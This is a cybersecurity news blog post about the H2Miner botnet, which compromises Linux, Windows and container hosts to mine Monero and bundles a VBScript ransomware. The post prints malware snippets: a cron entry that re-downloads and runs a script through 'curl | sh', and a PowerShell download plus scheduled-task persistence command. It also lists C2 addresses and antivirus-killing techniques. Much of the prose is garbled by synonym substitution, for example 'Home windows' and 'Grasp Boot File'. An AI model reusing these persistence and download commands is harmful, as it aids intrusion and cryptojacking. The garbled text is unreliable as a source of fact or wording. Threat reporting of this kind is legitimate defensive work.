Skip to content
  • Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form
H2Miner Attacking Linux, Windows, and Containers to Mine Monero

H2Miner Attacking Linux, Windows, and Containers to Mine Monero

Posted on July 17, 2025July 17, 2025 By CWS

The H2Miner botnet, first noticed in late 2019, has resurfaced with an expanded arsenal that blurs the road between cryptojacking and ransomware.

The newest marketing campaign leverages cheap digital personal servers (VPS) and a grab-bag of commodity malware to compromise Linux hosts, Home windows workstations, and container workloads concurrently.

By chaining cloud-aware shell scripts, cross-compiled binaries, and living-off-the-land instructions, the operators pivot rapidly from preliminary foothold to Monero mining—usually earlier than defenders discover the spike in CPU load.

Assaults start with opportunistic exploitation of misconfigured companies or weak purposes resembling Apache ActiveMQ (CVE-2023-46604) and Log4Shell.

As soon as inside, the botnet deploys tailor-made loader scripts—​ce.sh on Linux and 1.ps1 on Home windows—​that terminate competing miners, disable endpoint safety, and fetch the XMRig binary from 78.153.140.66. Containers should not spared: spr.sh scans Docker photos and ejects Alibaba Cloud’s aegis agent earlier than dropping Kinsing.

The identical infrastructure hosts a Cobalt Strike crew server at 47.97.113.36 and Bitbucket repositories that disguise payloads as “MicrosoftSoftware.exe,” illustrating a mature, multi-tier command-and-control (C2) design.

Fortinet analysts famous {that a} new VBScript ransomware, Lcrypt0rx, is now bundled alongside the miners.

Encryption logic and XOR implementation (Supply – Fortinet)

Though its encryption routine is rudimentary—​an 8,192-character XOR key stitched to a per-file salt, ​the script nonetheless overwrites the Grasp Boot File and litters the system with decoy persistence hooks.

Attribute manipulation and MBR overwrite (Supply – Fortinet)

The overlap of wallets and internet hosting addresses suggests both collaboration with, or direct management by, H2Miner’s authentic crew.

Cron entry and clearing command historical past (Supply – Fortinet)

This reveals that how ce.sh implants a cron job that re-downloads itself each ten minutes:-

( crontab -l 2>/dev/null ;
echo “*/10 * * * * curl -fsSL | sh” ) | crontab –

Apart from this, it highlights the Home windows counterpart, the place 1.ps1 registers XMRig as a scheduled job:

$miner = “$env:TEMPsysupdate.exe”
Invoke-WebRequest -Uri ” -OutFile $miner
schtasks /create /f /tn “Replace service for Home windows Service” `
/tr “$miner” /sc minute /mo 15 /rl highest

An infection Mechanism and Persistence

H2Miner’s sticking energy stems from its layered an infection sequence. The preliminary shell scripts enumerate defensive processes, kill them with brutal common expressions, and wipe audit trails by clearing shell historical past.

Wallpaper defacement (Supply – Fortinet)

On Home windows, Lcrypt0rx escalates by way of Shell.Software to relaunch itself with wscript.exe /elevated, then makes an attempt to cement persistence by mis-writing its path into the Winlogon Shell and IFEO keys.

Whereas that registry logic fails, the malware compensates by embedding six auxiliary scripts—​from advapi32_ext.vbs, which loops by taskkill /f /im *av*.exe, to USB_bridge.vbs, a rudimentary autorun propagator.

Every helper is dropped with +h +s +r attributes and invoked below HKCUSoftwareMicrosoftWindowsCurrentVersionRun, making certain at the least one copy survives cleanup.

This belt-and-suspenders method, coupled with frequent updater scripts like cpr.sh, lets the botnet respawn miners even after a partial eviction.

For defenders, which means endpoint remediation should embrace container photos, scheduled duties, cron entries, and rogue registry keys; in any other case, the Monero wallets—​notably 4ASk4RhU…p8SahC—​will proceed siphoning stolen compute cycles lengthy after the primary alert is closed.

Enhance detection, cut back alert fatigue, speed up response; all with an interactive sandbox constructed for safety groups -> Strive ANY.RUN Now

Cyber Security News Tags:Attacking, Containers, H2Miner, Linux, Monero, Windows

Post navigation

Previous Post: Hackers Exploiting Blind Spots in DNS Records to Store and Deliver Malware
Next Post: Hackers Use GitHub Repositories to Host Amadey Malware and Data Stealers, Bypassing Filters

Related Posts

WinRAR Directory Vulnerability Let Execute Arbitrary Code Using a Malicious File WinRAR Directory Vulnerability Let Execute Arbitrary Code Using a Malicious File Cyber Security News
Critical RCE Vulnerabilities in AI inference Engines Exposes Meta, Nvidia and Microsoft Frameworks Critical RCE Vulnerabilities in AI inference Engines Exposes Meta, Nvidia and Microsoft Frameworks Cyber Security News
Kali Linux Unveils Two New Tools to Boost Wi-Fi Performance for Raspberry Pi Users Kali Linux Unveils Two New Tools to Boost Wi-Fi Performance for Raspberry Pi Users Cyber Security News
Choosing the Right Tool for Network Penetration Testing Choosing the Right Tool for Network Penetration Testing Cyber Security News
Threat Actors With Stealer Malwares Processing Millions of Credentials a Day Threat Actors With Stealer Malwares Processing Millions of Credentials a Day Cyber Security News
UAT-638 Hackers Exploit Cityworks Zero-Day to Attack IIS Servers With VSHell Malware UAT-638 Hackers Exploit Cityworks Zero-Day to Attack IIS Servers With VSHell Malware Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Muddled Libra Exploits VMware vSphere in Cyber Attack
  • Feiniu NAS Devices Targeted in Major Botnet Attack
  • Rapid SSH Worm Exploits Linux Systems with Credential Stuffing
  • Odido Telecom Hacked: 6.2 Million Accounts Compromised
  • Lazarus Group Targets npm and PyPI with Malicious Packages

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • February 2026
  • January 2026
  • December 2025
  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Muddled Libra Exploits VMware vSphere in Cyber Attack
  • Feiniu NAS Devices Targeted in Major Botnet Attack
  • Rapid SSH Worm Exploits Linux Systems with Credential Stuffing
  • Odido Telecom Hacked: 6.2 Million Accounts Compromised
  • Lazarus Group Targets npm and PyPI with Malicious Packages

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News